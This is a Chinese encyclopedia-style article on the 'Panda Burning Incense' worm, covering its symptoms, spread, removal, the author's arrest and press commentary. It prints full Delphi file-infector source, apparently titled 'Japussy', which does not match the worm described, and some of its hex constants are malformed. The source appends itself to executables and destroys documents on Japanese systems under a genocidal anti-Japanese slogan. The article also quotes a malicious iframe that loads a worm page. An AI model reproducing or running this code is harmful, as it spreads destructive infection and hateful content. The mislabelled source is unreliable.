熊猫烧香

目录·【基本信息】
·【病毒描述】
·【中毒症状】
·【危害】
·【杀毒方法】
·【解决办法】
·【变种病毒】
·【破案介绍】
·【传播方法】
·【传播对象和运行过程】
·【一些报道和评论】
·【熊猫烧香的病毒源码】
·【熊猫烧香的第一版作者道歉信】
·【变种:金猪报喜】



【基本信息】
  病毒名称:熊猫烧香 ,worm.whBoy.(金山称),worm.nimaya.(瑞星称)
  病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”
  危险级别:★★★★★
  病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。
  影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003
【病毒描述】
  其实是一种蠕虫病毒的变种,而且是经过多次变种而来的。尼姆亚变种W(Worm.Nimaya.w),由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
【中毒症状】
  除了通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
【危害】
  病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe,可以通过U盘和移动硬盘等方式进行传播,并且利用Windows系统的自动播放功能来运行,搜索硬盘中的.exe可执行文件并感染,感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。据悉,多家著名网站已经遭到此类攻击,而相继被植入病毒。由于这些网站的浏览量非常大,致使“熊猫烧香”病毒的感染范围非常广,中毒企业和政府机构已经超过千家,其中不乏金融、税务、能源等关系到国计民生的重要单位。注:江苏等地区成为“熊猫烧香”重灾区。
【杀毒方法】
  各种版本的熊猫烧香专杀
  瑞星:http://it.rising.com.cn/channels/service/2006-11/1163505486d38734.shtml
  金山:http://tool.duba.net/zhuansha/253.shtml
  江民:http://www.jiangmin.com/download/zhuansha04.htm
  超级巡警:http://www.dswlab.com/dow/d2.html
  李俊:http://www.xdowns.com/soft/8/21/2007/Soft_34735.html
  虽然用户及时更新杀毒软件病毒库,并下载各杀毒软件公司提供的专杀工具,即可对“熊猫烧香”病毒进行查杀,但是如果能做到防患于未然岂不更好。
【解决办法】
  【1】 立即检查本机administrator组成员口令,一定要放弃简单口令甚至空口令,安全的口令是字母数字特殊字符的组合,自己记得住,别让病毒猜到就行。
  修改方法:右键单击我的电脑,选择管理,浏览到本地用户和组,在右边的窗格中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码就行。
  【2】 利用组策略,关闭所有驱动器的自动播放功能。
  步骤:单击开始,运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统,在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器,再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略就生效了。
  【3】 修改文件夹选项,以查看不明文件的真实属性,避免无意双击骗子程序中毒。
  步骤:打开资源管理器(按windows徽标键+E),点工具菜单下文件夹选项,再点查看,在高级设置中,选择查看所有文件,取消隐藏受保护的操作系统文件,取消隐藏文件扩展名。
  【4】 时刻保持操作系统获得最新的安全更新,不要随意访问来源不明的网站,特别是微软的MS06-014漏洞,应立即打好该漏洞补丁。
  同时,QQ、UC的漏洞也可以被该病毒利用,因此,用户应该去他们的官方网站打好最新补丁。此外,由于该病毒会利用IE浏览器的漏洞进行攻击,因此用户还应该给IE打好所有的补丁。如果必要的话,用户可以暂时换用Firefox、Opera等比较安全的浏览器。
  【5】 启用Windows防火墙保护本地计算机。同时,局域网用户尽量避免创建可写的共享目录,已经创建共享目录的应立即停止共享。
  此外,对于未感染的用户,病毒专家建议,不要登录不良网站,及时下载微软公布的最新补丁,来避免病毒利用漏洞袭击用户的电脑,同时上网时应采用“杀毒软件+防火墙”的立体防御体系。
【变种病毒】
  至此,据不完全统计,仅12月份至今,变种数已达90多个,个人用户感染熊猫烧香的已经高达几百万,企业用户感染数还在继续上升。反防毒专家表示,伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀,该病毒正在不断“繁衍”新的变种,密谋更加隐蔽的传播方式。反病毒专家建议,用户不打开可疑邮件和可疑网站,不要随便运行不知名程序或打开陌生人邮件的附件。
【破案介绍】
  我国破获的国内首例制作计算机病毒的大案
  [2007年2月12日]湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获病毒作者李俊(男,25岁,武汉新洲区人),他于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播,并且还以自己出售和由他人代卖的方式,在网络上将该病毒销售给120余人,非法获利10万余元。
  其他重要犯罪嫌疑人:雷磊(男,25岁,武汉新洲区人)、王磊(男,22岁,山东威海人)、叶培新(男,21岁,浙江温州人)、张顺(男,23岁,浙江丽水人)、王哲(男,24岁,湖北仙桃人)通过改写、传播“熊猫烧香”等病毒,构建“僵尸网络”,通过盗窃各种游戏账号等方式非法牟利。
  这是中国近些年来,发生比较严重的一次蠕虫病毒发作。影响较多公司,造成较大的损失。且对于一些疏于防范的用户来说,该病毒导致较为严重的损失。
  由于此病毒可以盗取用户名与密码,因此,带有明显的牟利目的。所以,作者才有可能将此病毒当作商品出售,与一般的病毒制作者只是自娱自乐、或显示威力、或炫耀技术有很大的不同。
  另,制作者李俊在被捕后,在公安的监视下,又在编写解毒软件。
【传播方法】
  “熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。
  金山分析:这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程
  1 拷贝文件
  病毒运行后,会把自己拷贝到
  C:\WINDOWS\System32\Drivers\spoclsv.exe
  2 添加注册表自启动
  病毒会添加自启动项
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe
  3 病毒行为
  a:每隔1秒
  寻找桌面窗口,并关闭窗口标题中含有以下字符的程序
  QQKav
  QQAV
  防火墙
  进程
  VirusScan
  网镖
  杀毒
  毒霸
  瑞星
  江民
  黄山IE
  超级兔子
  优化大师
  木马克星
  木马清道夫
  QQ病毒
  注册表编辑器
  系统配置实用程序
  卡巴斯基反病毒
  Symantec AntiVirus
  Duba
  esteem proces
  绿鹰PC
  密码防盗
  噬菌体
  木马辅助查找器
  System Safety Monitor
  Wrapped gift Killer
  Winsock Expert
  游戏木马检测大师
  msctls_statusbar32
  pjf(ustc)
  IceSword
  并使用的键盘映射的方法关闭安全软件IceSword
  添加注册表使自己自启动
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe
  并中止系统中以下的进程:
  Mcshield.exe
  VsTskMgr.exe
  naPrdMgr.exe
  UpdaterUI.exe
  TBMon.exe
  scan32.exe
  Ravmond.exe
  CCenter.exe
  RavTask.exe
  Rav.exe
  Ravmon.exe
  RavmonD.exe
  RavStub.exe
  KVXP.kxp
  kvMonXP.kxp
  KVCenter.kxp
  KVSrvXP.exe
  KRegEx.exe
  UIHost.exe
  TrojDie.kxp
  FrogAgent.exe
  Logo1_.exe
  Logo_1.exe
  Rundl132.exe
  b:每隔18秒
  点击病毒作者指定的网页,并用命令行检查系统中是否存在共享
  共存在的话就运行net share命令关闭admin$共享
  c:每隔10秒
  下载病毒作者指定的文件,并用命令行检查系统中是否存在共享
  共存在的话就运行net share命令关闭admin$共享
  d:每隔6秒
  删除安全软件在注册表中的键值
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  RavTask
  KvMonXP
  kav
  KAVPersonal50
  McAfeeUpdaterUI
  Network Associates Error Reporting Service
  ShStartEXE
  YLive.exe
  yassistse
  并修改以下值不显示隐藏文件
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
  CheckedValue -> 0x00
  删除以下服务:
  navapsvc
  wscsvc
  KPfwSvc
  SNDSrvc
  ccProxy
  ccEvtMgr
  ccSetMgr
  SPBBCSvc
  Symantec Core LC
  NPFMntor
  MskService
  FireSvc
  e:感染文件
  病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部
  并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址,
  用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到
  增加点击量的目的,但病毒不会感染以下文件夹名中的文件:
  WINDOW
  Winnt
  System Volume Information
  Recycled
  Windows NT
  WindowsUpdate
  Windows Media Player
  Outlook Express
  Internet Explorer
  NetMeeting
  Common Files
  ComPlus Applications
  Messenger
  InstallShield Installation Information
  MSN
  Microsoft Frontpage
  Movie Maker
  MSN Gamin Zone
  g:删除文件
  病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件
  使用户的系统备份文件丢失.
  瑞星最新病毒分析报告:“Nimaya(熊猫烧香)”
  这是一个传染型的DownLoad 使用Delphi编写
【传播对象和运行过程】
  ★本地磁盘感染
  病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行文件遍历感染
  注:不感染文件大小超过10485760字节以上的.
  (病毒将不感染如下目录的文件):
  Microsoft Frontpage
  Movie Maker
  MSN Gamin Zone
  Common Files
  Windows NT
  Recycled
  System Volume Information
  Documents and Settings
  ……
  (病毒将不感染文件名如下的文件):
  setup.exe
  NTDETECT.COM
  病毒将使用两类感染方式应对不同后缀的文件名进行感染
  1)二进制可执行文件(后缀名为:EXE,SCR,PIF,COM): 将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.
  2)脚本类(后缀名为:htm,html,asp,php,jsp,aspx): 在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
  <iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
  在感染时会删除这些磁盘上的后缀名为.GHO
  2.★生成autorun.inf
  病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联使病毒在用户点击被感染磁盘时能被自动运行。
  3.★局域网传播
  病毒生成随机个局域网传播线程实现如下的传播方式:
  当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典进行联接。(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务启动激活病毒。
  修改操作系统的启动关联
  下载文件启动
  与杀毒软件对抗
【一些报道和评论】
  “‘流氓软件’和病毒之间的界限已变得越来越模糊。为了达到更好的传播效果,并减少成本,不少中小厂商直接使用病毒进行‘流氓推广’。”昨日,反病毒专家直指流氓软件是这次“熊猫烧香”幕后黑手。
  据江民公司反病毒工程师称,已经发现了近期疯狂肆虐的“熊猫烧香”幕后势力的痕迹,“熊猫烧香”病毒被怀疑是由“超级巡警”软件的提供方在幕后推动,网上已经发现了产销一条龙盗窃销售网游设备的产业链。
  而从瑞星截获的“熊猫烧香(Worm.Nimaya)”样本进行分析,也有不少变种运行后会去从网上下载盗取“江湖”、“大话西游”、“魔兽”等网络游戏账号的木马。用户的计算机一旦被感染这些木马,游戏的账号、装备等就会被黑客窃取。黑客通过在网上倒卖网游账号、装备等获利。
  流氓软件分化:部分“洗白” 部分病毒化。全民范围内的讨伐使流氓软件开始出现“分化”。
  北京瑞星股份有限公司反病毒工程师史瑀向《每日经济新闻》表示,迫于技术和舆论的压力,制作流氓软件的厂商开始两极分化。一些大牌互联网厂商逐渐“洗白”,将软件的“流氓”程度降低,还有一些厂商干脆放弃推广“流氓软件”。然而,仍有大量的中小厂商是通过“流氓软件”起家的,通过“流氓软件”进行广告推广已经成为其公司主要甚至是唯一的收入来源。2006年下半年开始,一些厂商为了生存,不惜铤而走险,使用更加卑劣的手段进行流氓推广,并且采用更加恶毒的技术公然向反病毒软件、反流氓软件工具挑战。
  据瑞星公司客户服务中心的统计数据表明,从2006年6月开始,用户计算机由于流氓软件问题导致崩溃的求助数量已经超过了病毒。
  据专家介绍,这一时期的“流氓软件”有两大特点:一是编写病毒化。不少“流氓软件”为了防止被杀毒软件或流氓软件卸载工具发现,采用了病毒常用的Rootkit技术进行自我保护。Rootkit可以对自身及指定的文件进行隐藏或锁定,防止被发现和删除。带有Rootkit的“流氓软件”就像练就了“金钟罩”、“铁布杉”,不除去这层保护根本难伤其毫发。更有一些流氓软件,采用“自杀式”技术攻击杀毒软件。一旦发现用户安装或运行杀毒软件,便运行恶意代码,直接造成计算机死机、蓝屏,让用户误以为是杀毒软件存在问题。
  二是传播病毒化。为了达到更好的传播效果,并减小成本,不少中小厂商直接使用病毒进行“流氓推广”。用户的计算机感染病毒后,病毒会自动在后台运行,下载并安装“流氓软件”。同时,“流氓软件”安装后也会去从互联网自动下载运行病毒。大量的“流氓软件”开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。“流氓软件”和病毒之间的界限已变得越来越模糊。随着“流氓软件”不断朝着病毒的方向发展,要想彻底杀灭“流氓软件”就必须采用反病毒技术。
  利益驱使 流氓软件制造“熊猫烧香”?
  史瑀表示,2006年11月14日,瑞星发布流氓软件专用清除工具———卡卡上网安全助手3.0,首次将反病毒技术应用于反流氓软件当中。就在卡卡刚刚发布24小时,就有一个名为“my123”的恶意程序顶风作案,疯狂采用病毒化的编写技术来逃避卡卡的追杀,随后又出现了名为“3448.com”和“7939.com”两个流氓软件,它们锁定用户浏览器的首页以提高其网站访问量。
  此后,部分流氓软件开始和病毒合作。早先一个传播较广的蠕虫病毒“威金蠕虫(Worm.Viking)”,就会从病毒作者指定的网站去下载流氓软件、盗号木马等,并种植在用户的计算机上。
  “大量‘流氓软件’开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。”史瑀称,“‘熊猫烧香’病毒成为一个‘教科书’式的病毒,势必有大量的病毒会模仿它的特征进行编写。”
  1月29日,金山毒霸反病毒中心最新消息:“熊猫烧香”化身“金猪”,危害指数再度升级,按照目前“熊猫烧香”破坏程度,威胁将延伸至春节。而在瑞星全球反病毒监测网27日监测结果显示,27日一个“电眼间谍变种BSF(Trojan.Spy.Delf.bsf)”病毒又出现,该病毒与“熊猫烧香”病毒类似。
  而业内人士称,近日由于地震引起海底光缆中断,造成数百万使用国外杀毒软件的个人用户、数十万企业和政府局域网用户无法升级。这又意味着这些用户的电脑完全向病毒和黑客敞开了大门。
  “在没有法律法规出台前,流氓软件是不会缩手的,不排除‘熊猫烧香’是流氓软件所为。”昨日,中国反流氓软件联盟李佳衡表示:“只要有利益驱使,流氓软件就会变化形式,以更不容易察觉的病毒方式毫无忌惮地牟取利益。”
  熊猫烧香”化身“金猪”,春节大爆发。
  “长假是病毒的高发期,特别是长假之后,病毒综合症接踵而来。”金山毒霸反病毒专家戴光剑说,“目前我们已经截获‘金猪’的变种。被感染的电脑中不但‘熊猫’成群,而且‘金猪’能使系统被破坏,大量软件无法应用。”这一观点得到了上海市计算机病毒防范服务中心的认同。
  一旦中毒,用户也不用慌张,用户可拨打上海市信息化服务热线电话9682000寻求帮助。张丹
  “熊猫烧香”病毒攻略:防御和解除方法
  计世网消息 在2007年新年出现的“PE_FUJACKS”就是最近让广大互联网用户闻之色变的“熊猫烧香”。该病毒的作者为“武汉男生”(文件末签名”WhBoy”),这个版本的病毒已经集成了PE_FUJA CK和QQ大盗的代码,通过网络共享,文件感染和移动存储设备传播,尤其是感染网页文件,并在网页文件写入自动更新的代码,一旦浏览该网页,就会感染更新后的变种。
  不幸中招的用户都知道,“熊猫烧香”会占用局域网带宽,使得电脑变得缓慢,计算机会出现以下症状:熊猫烧香病毒会在网络共享文件夹中生成一个名为GameSetup.exe的病毒文件;结束某些应用程序以及防毒软件的进程,导致应用程序异常,或不能正常执行,或速度变慢;硬盘分区或者U盘不能访问使用;exe程序无法使用程序图标变成熊猫烧香图标;硬盘的根目录出现setup.exe auturun.INF文件 ;同时浏览器会莫名其妙地开启或关闭。
  该病毒主要通过浏览恶意网站、网络共享、文件感染和移动存储设备(如U盘)等途径感染,其中网络共享和文件感染的风险系数较高,而通过Web和移动存储感染的风险相对较低。该病毒会自行启动安装,生成注册列表和病毒文件%System%\drivers\spoclsv.exe ,并在所有磁盘跟目录下生成病毒文件setup.exe,autorun.inf 。
【熊猫烧香的病毒源码】
  program Japussy;
  uses
  Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
  const
  HeaderSize = 82432; //病毒体的大小
  IconOffset = EB8; //PE文件主图标的偏移量
  //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
  //查找2800000020的十六进制字符串可以找到主图标的偏移量
  {
  HeaderSize = 38912; //Upx压缩过病毒体的大小
  IconOffset = BC; //Upx压缩过PE文件主图标的偏移量
  //Upx 1.24W 用法: upx -9 --8086 Japussy.exe
  }
  IconSize = E8; //PE文件主图标的大小744字节
  IconTail = IconOffset + IconSize; //PE文件主图标的尾部
  ID = 444444; //感染标记
  //无用码,以备写入
  Catchword = &#039;If a race need to be killed out, it must be Yamato. &#039; +
  &#039;If a country need to be destroyed, it must be Japan! &#039; +
  &#039;*** W32.Japussy.Worm.A ***&#039;;
  {$R *.RES}
  function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
  stDCall; external &#039;Kernel32.dll&#039;; //函数声明
  var
  TmpFile: string;
  Si: STARTUPINFO;
  Pi: PROCESS_INFORMATION;
  IsJap: Boolean = False; //日文版操作系统标记
  { 判断是否为windows 9.X版本 }
  function IsWin9x: Boolean;
  var
  Ver: TOSVersionInfo;
  begin
  Result := False;
  Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not GetVersionEx(Ver) then
  Exit;
  if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
  Result := True;
  end;
  { 在流之间复制 }
  procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  dStartPos: Integer; Count: Integer);
  var
  sCurPos, dCurPos: Integer;
  begin
  sCurPos := Src.Position;
  dCurPos := Dst.Position;
  Src.Seek(sStartPos, 0);
  Dst.Seek(dStartPos, 0);
  Dst.CopyFrom(Src, Count);
  Src.Seek(sCurPos, 0);
  Dst.Seek(dCurPos, 0);
  end;
  { 将宿主文件从已感染的PE文件中分离出来,以备使用 }
  procedure ExtractFile(FileName: string);
  var
  sStream, dStream: TFileStream;
  begin
  try
  sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
  dStream := TFileStream.Create(FileName, fmCreate);
  try
  sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
  dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
  finally
  dStream.Free;
  end;
  finally
  sStream.Free;
  end;
  except
  end;
  end;
  { 填充STARTUPINFO结构 }
  procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
  begin
  Si.cb := SizeOf(Si);
  Si.lpReserved := nil;
  Si.lpDesktop := nil;
  Si.lpTitle := nil;
  Si.dwFlags := STARTF_USESHOWWINDOW;
  Si.wShowWindow := State;
  Si.cbReserved2 := 0;
  Si.lpReserved2 := nil;
  end;
  { 发带毒邮件 }
  procedure SendMail;
  begin
  //邮件终止
  end;
  { 感染PE文件 }
  procedure InfectOneFile(FileName: string);
  var
  HdrStream, SrcStream: TFileStream;
  IcoStream, DstStream: TMemoryStream;
  iID: LongInt;
  aIcon: TIcon;
  Infected, IsPE: Boolean;
  i: Integer;
  Buf: array[0..1] of Char;
  begin
  try //出错则文件正在被使用,退出
  if CompareText(FileName, &#039;JAPUSSY.EXE&#039;) = 0 then //是自己则不感染
  Exit;
  Infected := False;
  IsPE := False;
  SrcStream := TFileStream.Create(FileName, fmOpenRead);
  try
  for i := 0 to 8 do //检查PE文件头
  begin
  SrcStream.Seek(i, soFromBeginning);
  SrcStream.Read(Buf, 2);
  if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
  begin
  IsPE := True; //是PE文件
  Break;
  end;
  end;
  SrcStream.Seek(-4, soFromEnd); //检查感染标记
  SrcStream.Read(iID, 4);
  if (iID = ID) or (SrcStream.Size < 10240) then //小于10240的文件不被感染
  Infected := True;
  finally
  SrcStream.Free;
  end;
  if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
  Exit;
  IcoStream := TMemoryStream.Create;
  DstStream := TMemoryStream.Create;
  try
  aIcon := TIcon.Create;
  try
  //得到被感染文件的主图标(744字节),存入流
  aIcon.ReleaseHandle;
  aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
  aIcon.SaveToStream(IcoStream);
  finally
  aIcon.Free;
  end;
  SrcStream := TFileStream.Create(FileName, fmOpenRead);
  //头文件
  HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
  //写入病毒体主图标之前的数据
  CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
  //写入目前程序的主图标
  CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
  //写入病毒体主图标到病毒体尾部之间的数据
  CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
  //写入宿主程序
  CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
  //写入已感染的标记
  DstStream.Seek(0, 2);
  iID := 444444;
  DstStream.Write(iID, 4);
  finally
  HdrStream.Free;
  end;
  finally
  SrcStream.Free;
  IcoStream.Free;
  DstStream.SaveToFile(FileName); //替换宿主文件
  DstStream.Free;
  end;
  except;
  end;
  end;
  { 将目标文件写入无用码后删除 }
  procedure SmashFile(FileName: string);
  var
  FileHandle: Integer;
  i, Size, Mass, Max, Len: Integer;
  begin
  try
  SetFileAttributes(PChar(FileName), 0); //去掉只读属性
  FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
  try
  Size := GetFileSize(FileHandle, nil); //获取文件大小
  i := 0;
  Randomize;
  Max := Random(15); //写入无用码的随机次数
  if Max < 5 then
  Max := 5;
  Mass := Size div Max; //每个间隔块的大小
  Len := Length(Catchword);
  while i < Max do
  begin
  FileSeek(FileHandle, i * Mass, 0); //定位
  //写入无用码,将文件彻底破坏!
  FileWrite(FileHandle, Catchword, Len);
  Inc(i);
  end;
  finally
  FileClose(FileHandle); //关闭文件
  end;
  DeleteFile(PChar(FileName)); //删除
  except
  end;
  end;
  { 获得可以写入的驱动器列表 }
  function GetDrives: string;
  var
  DiskType: Word;
  D: Char;
  Str: string;
  i: Integer;
  begin
  for i := 0 to 25 do //遍历26个字母
  begin
  D := Chr(i + 65);
  Str := D + &#039;:\&#039;;
  DiskType := GetDriveType(PChar(Str));
  //得到本地磁盘和网络盘
  if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
  Result := Result + D;
  end;
  end;
  { 遍历目录,感染和摧毁文件 }
  procedure LoopFiles(Path, Mask: string);
  var
  i, Count: Integer;
  Fn, Ext: string;
  SubDir: TStrings;
  SearchRec: TSearchRec;
  Msg: TMsg;
  function IsValidDir(SearchRec: TSearchRec): Integer;
  begin
  if (SearchRec.Attr <> 16) and (SearchRec.Name <> &#039;.&#039;) and
  (SearchRec.Name <> &#039;..&#039;) then
  Result := 0 //不是目录
  else if (SearchRec.Attr = 16) and (SearchRec.Name <> &#039;.&#039;) and
  (SearchRec.Name <> &#039;..&#039;) then
  Result := 1 //不是根目录
  else Result := 2; //是根目录
  end;
  begin
  if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
  begin
  repeat
  PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
  if IsValidDir(SearchRec) = 0 then
  begin
  Fn := Path + SearchRec.Name;
  Ext := UpperCase(ExtractFileExt(Fn));
  if (Ext = &#039;.EXE&#039;) or (Ext = &#039;.SCR&#039;) then
  begin
  InfectOneFile(Fn); //感染可执行文件
  end
  else if (Ext = &#039;.HTM&#039;) or (Ext = &#039;.HTML&#039;) or (Ext = &#039;.ASP&#039;) then
  begin
  //感染HTML和ASP文件,将Base64编码后的病毒写入
  //感染浏览此网页的所有用户
  //哪位大兄弟愿意完成之?
  end
  else if Ext = &#039;.WAB&#039; then //Outlook地址簿文件
  begin
  //获取Outlook邮件地址
  end
  else if Ext = &#039;.ADC&#039; then //Foxmail地址自动完成文件
  begin
  //获取Foxmail邮件地址
  end
  else if Ext = &#039;IND&#039; then //Foxmail地址簿文件
  begin
  //获取Foxmail邮件地址
  end
  else
  begin
  if IsJap then //是倭文操作系统
  begin
  if (Ext = &#039;.DOC&#039;) or (Ext = &#039;.XLS&#039;) or (Ext = &#039;.MDB&#039;) or
  (Ext = &#039;.MP3&#039;) or (Ext = &#039;.RM&#039;) or (Ext = &#039;.RA&#039;) or
  (Ext = &#039;.WMA&#039;) or (Ext = &#039;.ZIP&#039;) or (Ext = &#039;.RAR&#039;) or
  (Ext = &#039;.MPEG&#039;) or (Ext = &#039;.ASF&#039;) or (Ext = &#039;.JPG&#039;) or
  (Ext = &#039;.JPEG&#039;) or (Ext = &#039;.GIF&#039;) or (Ext = &#039;.SWF&#039;) or
  (Ext = &#039;.PDF&#039;) or (Ext = &#039;.CHM&#039;) or (Ext = &#039;.AVI&#039;) then
  SmashFile(Fn); //摧毁文件
  end;
  end;
  end;
  //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
  Sleep(200);
  until (FindNext(SearchRec) <> 0);
  end;
  FindClose(SearchRec);
  SubDir := TStringList.Create;
  if (FindFirst(Path + &#039;*.*&#039;, faDirectory, SearchRec) = 0) then
  begin
  repeat
  if IsValidDir(SearchRec) = 1 then
  SubDir.Add(SearchRec.Name);
  until (FindNext(SearchRec) <> 0);
  end;
  FindClose(SearchRec);
  Count := SubDir.Count - 1;
  for i := 0 to Count do
  LoopFiles(Path + SubDir.Strings + &#039;\&#039;, Mask);
  FreeAndNil(SubDir);
  end;
  { 遍历磁盘上所有的文件 }
  procedure InfectFiles;
  var
  DriverList: string;
  i, Len: Integer;
  begin
  if GetACP = 932 then //日文操作系统
  IsJap := True; //去死吧!
  DriverList := GetDrives; //得到可写的磁盘列表
  Len := Length(DriverList);
  while True do //死循环
  begin
  for i := Len downto 1 do //遍历每个磁盘驱动器
  LoopFiles(DriverList + &#039;:\&#039;, &#039;*.*&#039;); //感染之
  SendMail; //发带毒邮件
  Sleep(1000 * 60 * 5); //睡眠5分钟
  end;
  end;
  { 主程序开始 }
  begin
  if IsWin9x then //是Win9x
  RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
  else //WinNT
  begin
  //远程线程映射到Explorer进程
  //
  end;
  //如果是原始病毒体自己
  if CompareText(ExtractFileName(ParamStr(0)), &#039;Japussy.exe&#039;) = 0 then
  InfectFiles //感染和发邮件
  else //已寄生于宿主程序并开始工作
  begin
  TmpFile := ParamStr(0); //创建临时文件
  Delete(TmpFile, Length(TmpFile) - 4, 4);
  TmpFile := TmpFile + #32 + &#039;.exe&#039;; //真正的宿主文件,多一个空格
  ExtractFile(TmpFile); //分离之
  FillStartupInfo(Si, SW_SHOWDEFAULT);
  CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
  0, nil, &#039;.&#039;, Si, Pi); //创建新进程运行之
  InfectFiles; //感染和发邮件
  end;
  end.
  CMD命令 shutdown -a //取消计算机中病毒后的倒记时关机。
【熊猫烧香的第一版作者道歉信】
  各位网友:
  你们好!我是熊猫烧香的第一版作者.
  我真的没有想到熊猫烧香在短短的两个月竟然疯狂感染到这个地步,真的是我的不对,或许真的是我低估了网络的力量,它的散播速度是我想不到的!对于所有中毒的网友,企业来说,可能是一个很大的打击,我对此表示深深的歉意!很对不起!
  我要解释一些事情,有人说熊猫烧香更改熊猫的图标是我在诋毁大熊猫!这里我要解释下,这是绝对没有的事情,完全是出于这个图片比较让我个人喜欢,才会用的!
  还有关于变种,我写这个的初衷也是这个,纯粹是为了编程研究,对于出了这么多变种,我是根本想不到的,这个责任也不全是在我的!还有人说熊猫病毒写出来是商业目的!这个完全是无稽之谈.我在这里承诺,本人是绝对没有更新过任何变种!
  关于中毒后的一些错误,有人中毒后会有蓝屏,无声,卡死,文件丢失这些现象!蓝屏和死机的原因很多可能,熊猫的主程序是不会造成电脑死机或蓝屏的,更不会把别人里面的文件弄丢失!
  还有人说我是个心理变态,我在前面已经说了,感染的速度,变种的数量是我所料想不到的.还有,我写这个病毒的初衷完全是为了编程研究.对于这个评论,我也就不多说什么了!
